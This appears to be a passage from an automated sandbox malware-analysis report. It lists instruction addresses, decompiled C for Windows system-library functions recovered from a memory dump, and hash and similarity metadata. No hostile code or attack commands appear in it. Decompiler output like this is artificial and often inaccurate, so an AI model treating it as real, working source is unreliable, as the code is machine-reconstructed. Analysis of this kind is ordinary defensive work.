                    0x0149283e
                    0x00000000
                    0x00000000
                    0x0149284e
                    0x01492850
                    0x01492851
                    0x01492854
                    0x01492857
                    0x0149285a
                    0x0149285c
                    0x0149285d
                    0x00000000
                    0x00000000
                    0x0149275d
                    0x01492761
                    0x00000000
                    0x01492767
                    0x0149276e
                    0x01492773
                    0x01492773
                    0x01492776
                    0x01492778
                    0x0149277e
                    0x0149277e
                    0x01492781
                    0x01492781
                    0x01492783
                    0x01492784
                    0x00000000
                    0x00000000
                    0x014d5bd8
                    0x014d5bde
                    0x014d5be4
                    0x014d5be6
                    0x014d5be8
                    0x014d5be9
                    0x014d5bee
                    0x014d5bf8
                    0x014d5bff
                    0x014d5c01
                    0x014d5c04
                    0x014d5c07
                    0x014d5c0b
                    0x014d5c0d
                    0x014d5c0d
                    0x014d5c15
                    0x014d5c18
                    0x014d5c1b
                    0x014d5c1b
                    0x014d5c1e
                    0x00000000
                    0x00000000
                    0x014928c3
                    0x014928c8
                    0x014928d2
                    0x014928d4
                    0x014928d8
                    0x014928db
                    0x014d5c26
                    0x014d5c28
                    0x014d5c2d
                    0x014d5c2d
                    0x00000000
                    0x00000000
                    0x014d5c34
                    0x014d5c36
                    0x014d5c49
                    0x014d5c4e
                    0x014d5c54
                    0x014d5c5b
                    0x014d5c5d
                    0x014d5c60
                    0x01492788
                    0x01492788
                    0x0149278b
                    0x0149278e
                    0x0149278e
                    0x0149278e
                    0x01492791
                    0x00000000
                    0x00000000
                    0x01492756
                    0x01492750
                    0x00000000
                    0x01492794
                    0x01492794
                    0x01492795
                    0x01492798
                    0x01492798
                    0x00000000
                    0x01492734
                    0x0149272c
                    0x01492700
                    0x014925ef
                    0x014925ef
                    0x014925ef
                    0x014925f2
                    0x014925f8
                    0x00000000
                    0x00000000
                    0x014925fe
                    0x00000000
                    0x014928e6
                    0x014928ec
                    0x014928ef
                    0x014928f5
                    0x014928f8
                    0x014928f8
                    0x00000000
                    0x014928f8
                    0x00000000
                    0x00000000
                    0x01492866
                    0x01492866
                    0x01492876
                    0x01492879
                    0x00000000
                    0x00000000
                    0x014927e0
                    0x014927e7
                    0x014927e9
                    0x014927eb
                    0x014d5afd
                    0x00000000
                    0x014d5afd
                    0x00000000
                    0x00000000
                    0x01492633
                    0x01492638
                    0x0149263b
                    0x0149263c
                    0x0149263e
                    0x01492640
                    0x01492642
                    0x01492647
                    0x01492649
                    0x0149264e
                    0x01492650
                    0x01492653
                    0x01492659
                    0x014926a2
                    0x014926a7
                    0x014926ac
                    0x014926b2
                    0x014d5b11
                    0x014d5b15
                    0x014d5b17
                    0x00000000
                    0x014926b8
                    0x014926b8
                    0x014926ba
                    0x014927a6
                    0x014927a6
                    0x014927a9
                    0x014927ab
                    0x014927b9
                    0x014927b9
                    0x014927be
                    0x014927c1
                    0x014927c3
                    0x014927c5
                    0x014927c7
                    0x014d5c74
                    0x014d5c79
                    0x014d5c79
                    0x014927c7
                    0x00000000
                    0x014926c0
                    0x014926c0
                    0x014926c3
                    0x014926c6
                    0x014926c6
                    0x014926c9
                    0x014926c9
                    0x00000000
                    0x014926c9
                    0x014926ba
                    0x0149265b
                    0x0149265b
                    0x0149265e
                    0x01492667
                    0x0149266d
                    0x01492677
                    0x0149267c
                    0x0149267f
                    0x01492681
                    0x014d5b49
                    0x014d5b4e
                    0x014927cd
                    0x014927d0
                    0x014927d1
                    0x014927d2
                    0x014927d4
                    0x014927dd
                    0x01492687
                    0x01492687
                    0x0149268a
                    0x0149268b
                    0x0149268e
                    0x0149268f
                    0x01492691
                    0x01492696
                    0x01492698
                    0x0149269d
                    0x0149269f
                    0x00000000
                    0x0149269f
                    0x01492681
                    0x00000000
                    0x00000000
                    0x01492846
                    0x00000000
                    0x00000000
                    0x01492605
                    0x0149260a
                    0x0149260c
                    0x01492611
                    0x01492616
                    0x01492619
                    0x01492619
                    0x0149261e
                    0x00000000
                    0x01492624
                    0x01492627
                    0x01492627
                    0x00000000
                    0x00000000
                    0x014d5b1f
                    0x00000000
                    0x00000000
                    0x01492894
                    0x0149289b
                    0x0149289d
                    0x014928a1
                    0x014d5b2b
                    0x014d5b2e
                    0x014d5b2e
                    0x014928a7
                    0x014928a9
                    0x014d5b04
                    0x014d5b09
                    0x014d5b09
                    0x014d5b09
                    0x00000000
                    0x00000000
                    0x014d5b35
                    0x014d5b3c
                    0x014928fb
                    0x014928fb
                    0x014926cc
                    0x014926cc
                    0x014926d0
                    0x00000000
                    0x014926d2
                    0x014926d2
                    0x00000000
                    0x014926d2
                    0x00000000
                    0x00000000
                    0x014925fe
                    0x0149292d
                    0x0149292f
                    0x01492930
                    0x01492935
                    0x01492938
                    0x0149293c
                    0x0149293e
                    0x01492940
                    0x01492944
                    0x01492947
                    0x01492948
                    0x0149294e
                    0x01492950
                    0x01492958
                    0x0149295a
                    0x0149295d
                    0x01492960
                    0x01492962
                    0x01492963
                    0x01492964
                    0x01492966
                    0x01492969
                    0x0149296a
                    0x0149296e
                    0x01492972
                    0x01492974
                    0x0149297c
                    0x0149297e
                    0x0149297f
                    0x01492980
                    0x01492981
                    0x01492982
                    0x01492983
                    0x01492984
                    0x01492985
                    0x01492986
                    0x01492987
                    0x01492988
                    0x01492989
                    0x0149298a
                    0x0149298b
                    0x0149298c
                    0x0149298d
                    0x0149298e
                    0x0149298f
                    0x01492990
                    0x01492992
                    0x01492997
                    0x014929a3
                    0x014929a6
                    0x014929ab
                    0x014929ad
                    0x014929b0
                    0x014929b2
                    0x014d5c80
                    0x014929b8
                    0x014929b8
                    0x014929bb
                    0x014929c0
                    0x014929c5
                    0x014929c6
                    0x014929c6
                    0x014929c9
                    0x014929cb
                    0x00000000
                    0x00000000
                    0x014929cd
                    0x014929d0
                    0x014929d9
                    0x014929db
                    0x014929dd
                    0x01492a7f
                    0x01492a84
                    0x01492a87
                    0x01492a89
                    0x014d5ca1
                    0x014d5ca3
                    0x00000000
                    0x01492a8f
                    0x01492a8f
                    0x00000000
                    0x01492a8f
                    0x00000000
                    0x014929e3
                    0x014929e3
                    0x014929e3
                    0x00000000
                    0x014929e3
                    0x014929dd
                    0x00000000
                    0x014929db
                    0x014929e6
                    0x014929e9
                    0x014929eb
                    0x014929ed
                    0x014929f3
                    0x014929f5
                    0x014929f8
                    0x014929fa
                    0x01492a97
                    0x01492a9a
                    0x01492a9d
                    0x01492add
                    0x00000000
                    0x01492a9f
                    0x01492aa2
                    0x01492aa5
                    0x01492aa8
                    0x01492aab
                    0x014d5cab
                    0x014d5caf
                    0x014d5cc5
                    0x014d5cda
                    0x014d5cdc
                    0x014d5cdf
                    0x014d5ce5
                    0x00000000
                    0x014d5ceb
                    0x014d5ced
                    0x014d5cee
                    0x00000000
                    0x014d5cee
                    0x014d5cb1
                    0x014d5cb4
                    0x014d5cb9
                    0x014d5cbb
                    0x00000000
                    0x014d5cbd
                    0x014d5cbd
                    0x00000000
                    0x014d5cbd
                    0x014d5cbb
                    0x01492ab1
                    0x01492ab1
                    0x01492ac4
                    0x01492ac6
                    0x01492ac6
                    0x00000000
                    0x01492ac6
                    0x01492aab
                    0x00000000
                    0x01492a00
                    0x01492a09
                    0x01492a0e
                    0x01492a21
                    0x01492a24
                    0x01492a35
                    0x01492a3a
                    0x01492a3d
                    0x01492a42
                    0x01492a59
                    0x01492a59
                    0x01492a5c
                    0x01492a5f
                    0x01492a5f
                    0x014929fa
                    0x014929f3
                    0x01492a64
                    0x01492a64
                    0x01492a6b
                    0x01492a6b
                    0x01492a6d
                    0x01492a72
                    0x01492a72
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 2cf39a31a97aaed49b9ac656f4e754bf2eb28690e0edbea8fd8404c32c2f39d8
                    • Instruction ID: 73482f204b1a5b2516c60f56aa29f119f442c4838d5aa52e2586321be016638e
                    • Opcode Fuzzy Hash: 2cf39a31a97aaed49b9ac656f4e754bf2eb28690e0edbea8fd8404c32c2f39d8
                    • Instruction Fuzzy Hash: 76C1A071E00219EBDF24DF99D890EAEBBB1FF58700F45406AE901BB360D774A946CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0149FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E0149FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0147EEF0(0x1557b60);
					_t134 =  *0x1557b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1557b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1557b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01476D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E014776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01508938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0146B150();
													}
													_t116 = E01506D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E014775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1558638; // 0x0
																	_t122 = L014738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E014776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E014776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0149FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L014770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0149FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0149FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0149FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0149FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0149FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1557b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1557b84 = _t75;
						_t73 = E0147EB70(_t134, 0x1557b60);
						if( *0x1557b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0147FF60( *0x1557b20);
							}
						}
						goto L5;
					}
				}
			}

















































                    0x0149fab0
                    0x0149fab2
                    0x0149fab3
                    0x0149fab4
                    0x0149fabc
                    0x0149fac0
                    0x0149fb14
                    0x0149fb17
                    0x0149fac2
                    0x0149fac8
                    0x0149facd
                    0x0149fad3
                    0x0149fad3
                    0x0149fadd
                    0x0149fb18
                    0x0149fb1b
                    0x0149fb1d
                    0x0149fb1e
                    0x0149fb1f
                    0x0149fb20
                    0x0149fb21
                    0x0149fb22
                    0x0149fb23
                    0x0149fb24
                    0x0149fb25
                    0x0149fb26
                    0x0149fb27
                    0x0149fb28
                    0x0149fb29
                    0x0149fb2a
                    0x0149fb2b
                    0x0149fb2c
                    0x0149fb2d
                    0x0149fb2e
                    0x0149fb2f
                    0x0149fb3a
                    0x0149fb3b
                    0x0149fb3e
                    0x0149fb41
                    0x0149fb44
                    0x0149fb47
                    0x0149fb4a
                    0x0149fb4d
                    0x0149fb53
                    0x014dbdcb
                    0x014dbdcb
                    0x0149fb59
                    0x0149fb5b
                    0x0149fb5b
                    0x0149fb5e
                    0x014dbdd5
                    0x014dbdd8
                    0x00000000
                    0x014dbdda
                    0x00000000
                    0x014dbdda
                    0x0149fb64
                    0x0149fb64
                    0x0149fb64
                    0x0149fb67
                    0x0149fb6e
                    0x0149fb70
                    0x0149fb72
                    0x00000000
                    0x0149fb78
                    0x0149fb7a
                    0x0149fb7a
                    0x0149fb7d
                    0x0149fb80
                    0x014dbddf
                    0x014dbde1
                    0x00000000
                    0x014dbde3
                    0x00000000
                    0x014dbde3
                    0x0149fb86
                    0x0149fb86
                    0x0149fb86
                    0x0149fb8b
                    0x0149fb90
                    0x0149fb92
                    0x0149fb94
                    0x0149fb9a
                    0x0149fb9b
                    0x0149fba1
                    0x014dbde8
                    0x014dbdeb
                    0x014dbded
                    0x014dbeb5
                    0x014dbeb5
                    0x014dbebb
                    0x014dbebd
                    0x014dbec3
                    0x014dbed2
                    0x014dbedd
                    0x014dbedd
                    0x014dbeed
                    0x00000000
                    0x014dbdf3
                    0x014dbdfe
                    0x014dbe06
                    0x014dbe0b
                    0x014dbe0d
                    0x014dbe0f
                    0x014dbe14
                    0x014dbe19
                    0x014dbe20
                    0x014dbe25
                    0x014dbe27
                    0x014dbe35
                    0x014dbe39
                    0x014dbe46
                    0x014dbe4f
                    0x014dbe54
                    0x014dbe56
                    0x014dbef8
                    0x014dbef8
                    0x00000000
                    0x014dbe5c
                    0x014dbe5c
                    0x014dbe60
                    0x00000000
                    0x014dbe66
                    0x014dbe66
                    0x014dbe7f
                    0x014dbe84
                    0x014dbe87
                    0x014dbe89
                    0x014dbe8b
                    0x014dbe99
                    0x014dbe9d
                    0x014dbea0
                    0x014dbeac
                    0x014dbeaf
                    0x014dbeb1
                    0x014dbeb3
                    0x014dbeb3
                    0x00000000
                    0x014dbea2
                    0x014dbea2
                    0x00000000
                    0x014dbea2
                    0x014dbe8d
                    0x014dbe8d
                    0x014dbe92
                    0x00000000
                    0x014dbe92
                    0x014dbe8b
                    0x014dbe60
                    0x014dbe3b
                    0x014dbe3b
                    0x014dbe3e
                    0x00000000
                    0x014dbe40
                    0x014dbe40
                    0x014dbe44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014dbe44
                    0x014dbe3e
                    0x014dbe29
                    0x014dbe29
                    0x00000000
                    0x014dbe29
                    0x014dbe27
                    0x00000000
                    0x0149fba7
                    0x0149fba7
                    0x0149fbab
                    0x014dbf02
                    0x0149fbb1
                    0x0149fbb1
                    0x0149fbb8
                    0x0149fbbd
                    0x0149fbbd
                    0x0149fbbf
                    0x0149fbbf
                    0x0149fbc5
                    0x0149fbcb
                    0x0149fbf8
                    0x0149fbf8
                    0x0149fbfa
                    0x00000000
                    0x0149fc00
                    0x0149fc00
                    0x0149fc03
                    0x00000000
                    0x0149fc09
                    0x0149fc09
                    0x0149fc0f
                    0x0149fc15
                    0x0149fc23
                    0x0149fc23
                    0x0149fc25
                    0x0149fc27
                    0x0149fc75
                    0x0149fc7c
                    0x0149fc84
                    0x00000000
                    0x0149fc29
                    0x0149fc29
                    0x0149fc2d
                    0x0149fc30
                    0x014dbf0f
                    0x00000000
                    0x0149fc36
                    0x0149fc38
                    0x0149fc3b
                    0x0149fc41
                    0x014dbf17
                    0x014dbf19
                    0x014dbf48
                    0x014dbf4b
                    0x00000000
                    0x014dbf1b
                    0x014dbf22
                    0x014dbf24
                    0x014dbf26
                    0x00000000
                    0x014dbf2c
                    0x014dbf37
                    0x014dbf39
                    0x014dbf3b
                    0x00000000
                    0x014dbf41
                    0x014dbf41
                    0x014dbf41
                    0x014dbf41
                    0x014dbf45
                    0x00000000
                    0x014dbf45
                    0x014dbf3b
                    0x014dbf26
                    0x00000000
                    0x0149fc47
                    0x0149fc47
                    0x0149fc49
                    0x0149fcb2
                    0x0149fcb4
                    0x0149fcb6
                    0x0149fcdc
                    0x0149fcdc
                    0x00000000
                    0x0149fcb8
                    0x0149fcc3
                    0x0149fcc5
                    0x0149fcc7
                    0x00000000
                    0x0149fcc9
                    0x0149fcc9
                    0x0149fccd
                    0x00000000
                    0x0149fccd
                    0x0149fcc7
                    0x00000000
                    0x0149fc4b
                    0x0149fc4b
                    0x0149fc4e
                    0x0149fc4e
                    0x0149fc51
                    0x0149fc51
                    0x0149fc54
                    0x0149fc5a
                    0x0149fc5c
                    0x0149fc5f
                    0x0149fc61
                    0x0149fc63
                    0x0149fc65
                    0x0149fc67
                    0x0149fc6e
                    0x0149fc72
                    0x0149fc72
                    0x0149fc72
                    0x0149fc72
                    0x0149fc67
                    0x0149fc61
                    0x00000000
                    0x0149fc5a
                    0x0149fc49
                    0x0149fc41
                    0x0149fc30
                    0x0149fc27
                    0x0149fc03
                    0x0149fbcd
                    0x0149fbd3
                    0x0149fbd9
                    0x0149fbdc
                    0x0149fbde
                    0x0149fc99
                    0x0149fc9b
                    0x0149fc9d
                    0x0149fcd5
                    0x0149fcd5
                    0x0149fc89
                    0x0149fc89
                    0x00000000
                    0x0149fc9f
                    0x0149fc9f
                    0x0149fca3
                    0x00000000
                    0x0149fca3
                    0x00000000
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe9
                    0x0149fbf2
                    0x00000000
                    0x0149fbf2
                    0x0149fbde
                    0x0149fbcb
                    0x0149fbab
                    0x0149fc8b
                    0x0149fc8b
                    0x0149fc8c
                    0x0149fb80
                    0x0149fb72
                    0x0149fb5e
                    0x0149fc8d
                    0x0149fc91
                    0x0149fadf
                    0x0149fadf
                    0x0149fae1
                    0x0149fae4
                    0x0149fae7
                    0x0149faec
                    0x0149faf8
                    0x0149fb00
                    0x0149fb07
                    0x0149fb0f
                    0x0149fb0f
                    0x0149fb07
                    0x00000000
                    0x0149faf8
                    0x0149fadd

                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 014DBE0F
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: f50a75eda3c7499e9ce42ae20a98457e801d9b94a413c25b9b9bda08d88477df
                    • Instruction ID: 71048c476ae72936d64fa5d934a798572ee7b0d3557bf79224b90959b2327cdd
                    • Opcode Fuzzy Hash: f50a75eda3c7499e9ce42ae20a98457e801d9b94a413c25b9b9bda08d88477df
                    • Instruction Fuzzy Hash: ECA1F631B006468BEF21DF69C4607AABFA5FF59720F05456FD906CB7A1DB30D84A8790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01462D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                    Download Yara Rule
                    C-Code - Quality: 63%
                    			E01462D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1555350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1557bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E014A97C0();
				}
				if( *0x15579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x15579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01491624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01487D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E014FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E014A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0149E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L014BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1556901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1556901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E014A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E014A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01487D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01487D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
